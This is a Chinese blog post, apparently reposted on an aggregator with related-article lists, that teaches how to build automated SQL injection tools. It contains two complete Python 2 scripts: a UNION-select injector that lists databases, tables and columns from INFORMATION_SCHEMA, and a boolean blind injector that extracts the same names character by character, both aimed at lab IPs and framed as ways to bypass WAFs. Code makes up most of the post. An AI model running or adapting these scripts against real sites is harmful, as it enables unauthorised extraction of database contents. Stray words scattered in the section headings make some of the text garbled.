如何編寫一個SQL注入工具
0x01 前言php
一直在思考如何編寫一個自動化注入工具,這款工具不用太複雜,可是能夠用最簡單、最直接的方式來獲取數據庫信息,根據自定義構造的payload來繞過防禦,這樣子就能夠。python
0x02 SQL注入工具sql
A、聯合查詢數據庫
union select 實現起來最爲簡單,報錯注入的實現方式也基本一致,主要思路:獲取全部數據庫名--選擇數據庫--查看這個數據庫下全部表---選擇表--查詢這個表下全部列名。安全
代碼詳情:微信
#! /usr/bin/env python # _*_ coding:utf-8 _*_ import requests import urllib import re values={} def get(url,values): data = urllib.urlencode(values) geturl = url+'?'+data response = requests.get(geturl) result=response.content find_list=re.findall(r"qwe~(.+?)~qwe", result) if len(find_list)>0: return find_list def get_database_name(url): values['id'] = "1 and 1=2 union select 1,concat(0x7177657E,schema_name,0x7E717765) from INFORMATION_SCHEMA.SCHEMATA" name_list=get(url,values) print 'The databases:' for i in name_list: print i+" ", print "\n" def table_name(url): database_name=raw_input('please input your database:') values['id'] = "1 union select 1,concat(0x7177657E,table_name,0x7E717765) from information_schema.tables where table_schema="+"'"+database_name+"'" name_list=get(url,values) print 'The table is :' for i in name_list: print i+" ", print "\n" def column_name(url): table_name=raw_input('please input your table:') values['id'] = "1 union select 1,concat(0x7177657E,column_name,0x7E717765) from information_schema.columns where table_name="+"'"+table_name+"'" name_list=get(url,values) print 'The column is :' for i in name_list: print i+" ", if __name__ == '__main__': url='http://192.168.106.130/config/sql.php' get_database_name(url) table_name(url) column_name(url)
運行效果:網絡
B、盲注app
盲注的腳本,但總感受代碼不過簡潔,越簡單越好,能夠把局部代碼直接拿出來用,簡單修改payload就能夠獲取數據,基於布爾盲注,GET,寫的一個簡單的注入腳本。ide
主要思路:獲取當前數據庫名--選擇數據庫--獲取這個數據庫有幾個表--依次獲取每一個表的長度--依次獲取獲取表名--依次獲取每一個表的長度、列名。工具
#! /usr/bin/env python # _*_ coding:utf-8 _*_ import requests import urllib import time start_time = time.time() def database_length(url): values={} for i in range(1,100): values['id'] = "1 and (select length(database()))=%s" %i data = urllib.urlencode(values) geturl = url+'?'+data response = requests.get(geturl) if response.content.find('qwertyasd')>0: return i def database_name(url): payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.' values={} databasename= '' aa = 15 aa = database_length(url) for i in range(1, aa+1): for payload in payloads: values['id'] = "1 and ascii(substring(database(),%s,1))=%s " %(i,ord(payload)) data = urllib.urlencode(values) geturl = url+'?'+data response = requests.get(geturl) if response.content.find('qwertyasd')>0: databasename += payload return databasename #print database_name('http://192.168.125.129/config/sql.php') def table_count(url,database): values={} for i in range(1,100): values['id'] = "1 and (select count(table_name) from information_schema.tables where table_schema="+"'"+database+"')"+"=%s" %i data = urllib.urlencode(values) geturl = url+'?'+data response = requests.get(geturl) if response.content.find('qwertyasd')>0: return i def table_length(url,a,database): values={} for i in range(1,100): values['id'] = "1 and (select length(table_name) from information_schema.tables where table_schema="+"'"+database+"'"+" limit %s,1)=%s" %(a,i) data = urllib.urlencode(values) geturl = url+'?'+data response = requests.get(geturl) if response.content.find('qwertyasd')>0: return i def table_name(url,database): payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.' values={} table_name=[] bb = table_count(url,database) for i in range(0,bb+1): user= '' cc=table_length(url,i,database) if cc==None: break for j in range(0,cc+1): for payload in payloads: values['id'] = "1 and ascii(substring((select table_name from information_schema.tables where table_schema="+"'"+database+"'"+" limit %s,1),%s,1))=%s " %(i,j,ord(payload)) data = urllib.urlencode(values) geturl = url+'?'+data response = requests.get(geturl) if response.content.find('qwertyasd')>0: user += payload #print payload table_name.append(user) return table_name #print table_name('http://192.168.125.129/config/sql.php','test') def column_count(url,table_name): values={} for i in range(1,100): values['id'] = "1 and (select count(column_name) from information_schema.columns where table_name="+"'"+table_name+"'"+")=%s" %i data = urllib.urlencode(values) geturl = url+'?'+data response = requests.get(geturl) if response.content.find('qwertyasd')>0: return i def column_length(num,url,table_name): values={} for i in range(1,100): limit = " limit %s,1)=%s" %(num,i) values['id'] = "1 and (select length(column_name) from information_schema.columns where table_name="+"'"+table_name+"'"+limit data = urllib.urlencode(values) geturl = url+'?'+data response = requests.get(geturl) if response.content.find('qwertyasd')>0: return i def column_name(url,table_name): payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.' values={} column_name=[] dd=column_count(url,table_name) for i in range(0,dd+1): user= '' bb=column_length(i,url,table_name) if bb==None: break for j in range(0,bb+1): for payload in payloads: limit=" limit %s,1),%s,1))=%s" %(i,j,ord(payload)) values['id'] = "1 and ascii(substring((select column_name from information_schema.columns where table_name="+"'"+table_name+"'"+limit data = urllib.urlencode(values) geturl = url+'?'+data response = requests.get(geturl) if response.content.find('qwertyasd')>0: user += payload column_name.append(user) return column_name #print column_name('http://192.168.125.129/config/sql.php','admin') if __name__ == '__main__': url='http://192.168.125.129/config/sql.php' databasename=database_name(url) print "The current database:"+databasename database=raw_input("Please input your databasename: ") tables=table_name(url,database) print database+" have the tables:", print tables for table in tables: print table+" have the columns:" print column_name(url,table) print 'Use for: %d second' % (time.time() - start_time)
運行效果:
0x03 END
經過編寫簡單的SQL注入腳原本獲取數據,腳本實現得很簡單,擴展空間還很大,只爲以最簡單的方式來Bypass WAF數據獲取。
關於我:一個網絡安全愛好者,致力於分享原創高質量乾貨,歡迎關注個人我的微信公衆號:Bypass--,瀏覽更多精彩文章。
相關文章
- 1. sql注入工具
- 2. Python-編寫一個mysql注入漏洞檢測工具
- 3. 如何編寫一個簡單的依賴注入容器
- 4. 如何防止sql注入
- 5. 如何預防sql注入
- 6. java中如何寫一個註解
- 7. 如何使用SQLAlchemy庫寫出防SQL注入的Raw SQL
- 8. 如何寫一個編譯時註解框架
- 9. 如何編寫一個shell腳本
- 10. [Servlet]如何編寫一個Servlet
- 更多相關文章...
- • XSD 如何使用? - XML Schema 教程
- • SQLite 注入 - SQLite教程
- • PHP開發工具
- • Java Agent入門實戰(一)-Instrumentation介紹與使用
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. js中 charCodeAt
- 2. Android中通過ViewHelper.setTranslationY實現View移動控制(NineOldAndroids開源項目)
- 3. 【Android】日常記錄:BottomNavigationView自定義樣式,修改點擊後圖片
- 4. maya 文件檢查 ui和數據分離 (一)
- 5. eclipse 修改項目的jdk版本
- 6. Android InputMethod設置
- 7. Simulink中Bus Selector出現很多? ? ?
- 8. 【Openfire筆記】啓動Mac版Openfire時提示「系統偏好設置錯誤」
- 9. AutoPLP在偏好標籤中的生產與應用
- 10. 數據庫關閉的四種方式
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. sql注入工具
- 2. Python-編寫一個mysql注入漏洞檢測工具
- 3. 如何編寫一個簡單的依賴注入容器
- 4. 如何防止sql注入
- 5. 如何預防sql注入
- 6. java中如何寫一個註解
- 7. 如何使用SQLAlchemy庫寫出防SQL注入的Raw SQL
- 8. 如何寫一個編譯時註解框架
- 9. 如何編寫一個shell腳本
- 10. [Servlet]如何編寫一個Servlet